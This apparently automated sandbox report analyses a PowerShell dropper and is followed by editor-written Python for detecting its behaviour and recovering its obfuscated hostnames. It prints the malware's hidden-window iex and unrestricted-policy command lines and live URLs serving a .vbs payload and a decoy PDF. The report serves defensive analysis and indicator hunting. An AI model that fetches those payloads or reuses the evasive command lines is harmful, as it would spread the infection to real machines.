
Windows Analysis Report
2rTi9MgX25.ps1

Overview

General Information

Sample name: 2rTi9MgX25.ps1 (renamed because the original name is a hash value)
Original sample name: 89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf.ps1
Analysis ID: 1578221
MD5: 28e4d353dd649e9252cb62d9be6fb391
SHA1: 16ecf4dcec8d1bdf466de38daf89b4d39af55834
SHA256: 89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf
Tags: 185-236-228-92, 87-120-112-91, ps1, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 8044 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 1408 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7588 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 3812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7572 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7572.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

      System Summary

      Source: Process started
        Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
        Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7572, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", ProcessId: 7796, ProcessName: powershell.exe
      Source: File created
        Author: Florian Roth (Nextron Systems)
        Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7572, TargetFilename: C:\Users\Public\iys.vbs
      Source: Process started
        Author: frack113
        Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", ProcessId: 7572, ProcessName: powershell.exe
      Source: File created
        Author: frack113, Nasreddine Bencherchali (Nextron Systems)
        Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7572, TargetFilename: C:\Users\Public\iys.vbs
      Source: Process started
        Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
        Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", ProcessId: 7572, ProcessName: powershell.exe
      Source: Process started
        Author: vburov
        Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3812, ProcessName: svchost.exe
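The Sigma matches above all key on the same few observable fields: image, parent image, command line and file-create target. The block below is an example added by the editor, not Joe Sandbox code and not the Sigma rules themselves: a simplified Python re-implementation of those checks, run over events constructed from the process tree and file writes reported on this page. The check names, parameter substrings and folder lists are the editor's approximations rather than the Sigma rule identifiers, and Sysmon event IDs 1 (process create) and 11 (file create) are assumed as the event model.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal Sysmon-style event (assumed model): ID 1 = process creation,
    ID 11 = file create. Only the fields the checks below need."""
    event_id: int
    image: str
    command_line: str = ""
    parent_image: str = ""
    target_filename: str = ""


# Editor's approximations of the rule logic, not the Sigma rules' own lists.
POWERSHELL = ("powershell.exe", "pwsh.exe")
SCRIPT_HOSTS = POWERSHELL + ("cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# Abbreviated or unusual parameter forms (this sample uses "-win hidden").
SUSPICIOUS_PARAMS = (" -win hidden", " -w hidden", " -windowstyle hidden",
                     " -nop ", " -noni ", " -ep bypass", " -enc ")
# "-ExecutionPolicy unrestricted" as in this sample, plus bypass and the short aliases.
INSECURE_POLICY = re.compile(r"-(?:executionpolicy|ep|ex)\s+(?:unrestricted|bypass)")
SUSPICIOUS_FOLDERS = ("c:\\users\\public\\", "c:\\perflogs\\",
                      "c:\\windows\\temp\\", "c:\\programdata\\")
DROPPED_EXT = (".vbs", ".js", ".jse", ".ps1", ".bat", ".cmd", ".hta", ".exe", ".dll")


def _name(path):
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.rsplit("\\", 1)[-1].lower()


def check(ev):
    """Return the names of the checks a single event trips (empty list if none)."""
    hits = []
    if ev.event_id == 1 and _name(ev.image) in POWERSHELL:
        cl = " " + ev.command_line.lower() + " "   # pad so substrings can anchor on spaces
        if any(p in cl for p in SUSPICIOUS_PARAMS):
            hits.append("suspicious_powershell_parameter")
        if INSECURE_POLICY.search(cl):
            hits.append("insecure_execution_policy")
        if _name(ev.parent_image) in POWERSHELL:
            hits.append("powershell_spawns_powershell")
    elif ev.event_id == 11 and _name(ev.image) in SCRIPT_HOSTS:
        target = ev.target_filename.lower()
        if target.startswith(SUSPICIOUS_FOLDERS) and target.endswith(DROPPED_EXT):
            hits.append("script_dropper_to_suspicious_folder")
    return hits


def scan(events):
    """Run check() over a list of events; return {index: hits} for events that hit."""
    return {i: h for i, ev in enumerate(events) if (h := check(ev))}


# Events constructed from this report's process tree and file writes (not a real log).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(1, PS, '"' + PS + r'" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1"'),
    Event(1, PS, '"' + PS + r'''" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"''',
          parent_image=PS),
    Event(11, PS, target_filename=r"C:\Users\Public\iys.vbs"),
    # The decoy PDF goes to the Desktop, outside the watched folders: expected to stay quiet.
    Event(11, PS, target_filename=r"C:\Users\user\Desktop\List of Required items and services.pdf"),
    Event(1, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, _name(SAMPLE_EVENTS[i].image), hits)
```

The two benign-looking events (the decoy PDF written to the Desktop and the BITS svchost start) are included as negatives; only the parent powershell.exe with the unrestricted policy, the hidden-window child, and the .vbs written to C:\Users\Public fire, which is the same three-way split the Sigma matches above show.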
      No Suricata rule has matched


      AV Detection

      Source: 2rTi9MgX25.ps1; Avira: detected
      Source: 2rTi9MgX25.ps1; ReversingLabs: Detection: 34%
      Source: 2rTi9MgX25.ps1; Virustotal: Detection: 41%
      Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.9% probability
      Source: unknown; HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49712 version: TLS 1.2
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbl source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1404370506.000001E357BFD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BACC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BACC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$M| source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb) source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000001.00000002.1618094806.0000025F5B805000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbFu source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb6vi source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeN source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb7M source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
      Source: global traffic; HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1; Host: www.astenterprises.com.pk; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1; Host: www.bluemaxxlaser.com; Connection: Keep-Alive
      Source: Joe Sandbox View; IP Address: 203.175.174.69
      Source: Joe Sandbox View; IP Address: 107.161.23.150
      Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
      Source: global traffic; HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1; Host: www.astenterprises.com.pk; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1; Host: www.bluemaxxlaser.com; Connection: Keep-Alive
      Source: global traffic; DNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global traffic; DNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global traffic; DNS traffic detected: DNS query: x1.i.lencr.org
      Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 19 Dec 2024 11:44:33 GMT; Server: Apache; Content-Length: 315; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
      Source: svchost.exe, 00000009.00000002.2582093063.0000014B43400000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.9.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.9.dr, qmgr.db.9.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://go.micros
      Source: powershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F451A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F451E9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F451A3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F43892000.00000004.00000800.00020000.00000000.sdmp, 2rTi9MgX25.ps1; String found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs
      Source: powershell.exe, 00000001.00000002.1622194811.0000025F5B900000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr; String found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
      Source: qmgr.db.9.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 00000009.00000003.1475779786.0000014B432D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33FF54000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.9.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
      Source: ReaderMessages.6.dr; String found in binary or memory: https://www.adobe.co
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F4514B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p
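Two of the strings above occur both in an obfuscated form (in the script and in process memory) and in cleartext (in memory and in the GET requests): www.blujlqmaxxlasjlqr.com beside www.bluemaxxlaser.com, and astjlqntjlqrprisjlqs.com.pk beside astenterprises.com.pk. The pairs are consistent with the script storing its URLs with every letter e replaced by the junk token jlq and undoing that replacement at run time, which is why a plain search of the .ps1 for the hostname finds nothing. The block below is an example added by the editor, not code from the sample or from Joe Sandbox: it infers the token and replacement character from the one complete pair the report shows, applies them to the truncated PDF URL (kept exactly as printed above, ending in ".p"), and returns the hostnames to hunt for. That the substitution is a single-token, single-character replacement is the editor's inference from the report's strings alone.

```python
from urllib.parse import urlsplit

# Constructed from the strings in this report: the obfuscated form found in
# 2rTi9MgX25.ps1 / powershell.exe memory, and the cleartext form seen in memory and
# in the GET requests. The obfuscated PDF URL is kept truncated at ".p", as printed.
OBFUSCATED_VBS_URL = "http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs"
OBSERVED_VBS_URL = "http://www.bluemaxxlaser.com/ms/ms.vbs"
OBFUSCATED_PDF_URL = ("https://www.astjlqntjlqrprisjlqs.com.pk/ms/"
                      "List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p")
OBSERVED_PDF_URL = ("https://www.astenterprises.com.pk/ms/"
                    "List%20of%20required%20items%20and%20services.pdf")


def infer_substitution(obfuscated, cleartext, max_token_len=6):
    """Find the shortest junk token t and single character c such that
    obfuscated.replace(t, c) == cleartext. Editor's assumption: the script undoes
    its obfuscation with one plain string replacement. Returns (t, c) or None."""
    for n in range(2, max_token_len + 1):
        for i in range(len(obfuscated) - n + 1):
            token = obfuscated[i:i + n]
            if token in cleartext:      # a junk token never survives into the cleartext
                continue
            for ch in sorted(set(cleartext)):
                if obfuscated.replace(token, ch) == cleartext:
                    return token, ch
    return None


def deobfuscate(s, token, ch):
    """Undo the junk-token substitution (what the script itself must do before use)."""
    return s.replace(token, ch)


def recover_hosts(obfuscated_urls, known_pair):
    """Infer the substitution from one known (obfuscated, cleartext) pair, apply it to
    every obfuscated URL, and return the sorted set of hostnames to hunt for."""
    sub = infer_substitution(*known_pair)
    if sub is None:
        raise ValueError("no single-token substitution explains the known pair")
    token, ch = sub
    cleaned = [deobfuscate(u, token, ch) for u in obfuscated_urls]
    return sorted({urlsplit(u).hostname for u in cleaned})


if __name__ == "__main__":
    print(infer_substitution(OBFUSCATED_VBS_URL, OBSERVED_VBS_URL))
    print(deobfuscate(OBFUSCATED_PDF_URL, "jlq", "e"))
    print(recover_hosts([OBFUSCATED_VBS_URL, OBFUSCATED_PDF_URL],
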